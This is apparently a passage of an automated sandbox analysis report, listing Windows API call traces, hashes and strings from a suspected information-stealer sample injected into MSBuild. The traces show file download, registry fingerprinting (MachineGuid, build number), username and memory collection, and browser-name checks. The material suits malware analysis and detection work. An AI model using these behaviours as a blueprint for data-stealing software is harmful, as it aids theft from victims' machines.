                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                            • String ID: :\$C
                                                                                                                                                                                                                                                                            • API String ID: 2389002695-3309953409
                                                                                                                                                                                                                                                                            • Opcode ID: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                            • Instruction ID: 480affee391e33356010d181296b11b1904528edf9fade7e017b84c509911b2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6705a00220cc022f61928ee9874d8f35f6da8f4b6566dbd53bd07c02a58f791
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741C371901218ABDB10EBE4DC05BEEBB79EF08704F10015EFA05B7281EBB85A44C7E5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405925
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,0000000B), ref: 00405951
                                                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405976
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405999
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004059B2
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,000000FF,0041FFE8,00000000,?,?,?,?,?,?,0000000B), ref: 004059D6
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405A00
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 00405A1C
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405A23
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405A2A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 105467990-0
                                                                                                                                                                                                                                                                            • Opcode ID: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                            • Instruction ID: ad3e8e31fbd1234b42d1b8aa39bbe646f14909c43cf7d3cadb2e212234b9bc59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51C271910308ABEB10DBA0CC86FEF7779EB05714F504169F601B72C1DB78AA08CBA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39890,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                            • Opcode ID: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                            • Instruction ID: 797b0d2c89d37aa4bb5ea973c038b2c02b127ec3880a0442df269e7358998569
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50325A74900348DFCB14DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39890,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39810), ref: 0040ECE0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00E39820), ref: 0040EDE3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                            • Opcode ID: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                            • Instruction ID: 065ccd6fded3c9645b02dfe38afe88cf5481e2341bba9ab26d00f1f73bb39b14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86324A74900348DFCB24DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410C9E
                                                                                                                                                                                                                                                                            • CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CharCloseOpenQueryValuememset
                                                                                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                            • API String ID: 2391366103-1211650757
                                                                                                                                                                                                                                                                            • Opcode ID: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                            • Instruction ID: 460f4ab23b8a3188437fc1a8912af36b6d87c49434b27b75157095bf63d9280c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C501D87964421DFBDB24DB90DC46FDA777C9B14700F104195B648A21C1EAB46B848B54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(00000000,00E2A8A0), ref: 004185C0
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AA98), ref: 004185ED
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AAB0), ref: 00418606
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A960), ref: 0041861E
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A978), ref: 00418636
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2E4F0), ref: 0041864F
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33B78), ref: 00418667
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33918), ref: 0041867F
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AB58), ref: 00418698
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AAF8), ref: 004186B0
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AB70), ref: 004186C8
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2AA08), ref: 004186E1
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E33938), ref: 004186F9
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A888), ref: 00418711
                                                                                                                                                                                                                                                                              • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00E2A8B8), ref: 0041872A
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: CreateDCA.GDI32(00E2E5B0,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                                                              • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E2E4B0,?,00427854,?,00000000,0042738B), ref: 00418526
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418531
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 0041853C
                                                                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418552
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041856C
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041857A
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00418582
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3108587868-0
                                                                                                                                                                                                                                                                            • Opcode ID: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                            • Instruction ID: 55b900fef8fb81f1d8c87853b9dcba1fdba1e1d9fc668c1e9ac9258d03b45c33
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A214F319001046ADB10F7F1ED56FEE7769AF15749F50017EB602B20E2EF782A44C6A9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                                                                                            • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                                            • Opcode ID: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                                                            • Instruction ID: b34fd57166b640466ff53f1d7e025f9f2fa8d164da18c3b6a8d9ee5040319ab5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A2190B1900308ABDB10DFA4D845BDE7BB8FB05724F10022AFA14A72C1DB785A45CB94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                              • Part of subcall function 004101A0: RegCloseKey.ADVAPI32(?), ref: 004101FF
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,00000000), ref: 00410F31
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00E39BB0,00000000,00000000,00000000,000000FF), ref: 00410F4C
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410F56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID: Windows 11
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                                                                            • Opcode ID: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                            • Instruction ID: 1edb6a64258ba8bc4fb645b0016c63393baf42ba23ff777e5691d4b5187ede9d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3012678600219FBE720DBE0EC4AFAA777DEB05701F004265FF08D3240D6B4994087A0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306A0,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004101FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                                                            • Opcode ID: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                            • Instruction ID: 19236cbb0df9c8bc93342aa8950c0f55e3fb02da4f2605f2dcdb39d085d0879d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF062B9941224FBE710DBE0EC4AFAB7B7DEB09B01F001155FB0596281E6B46A4487B5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                            • String ID: %d MB$@
                                                                                                                                                                                                                                                                            • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00416F81
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00E39038,00000000,00020119,00422A38), ref: 00416FA0
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00422A38,00E39E08,00000000,00000000,?,000000FF), ref: 00416FC4
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00422A38), ref: 00416FCE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416FF3
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39EB0), ref: 00417007
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2623679115-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00E39770,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,00420210,000000FF,?,0040BCD3,00E38D30), ref: 004072B1
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
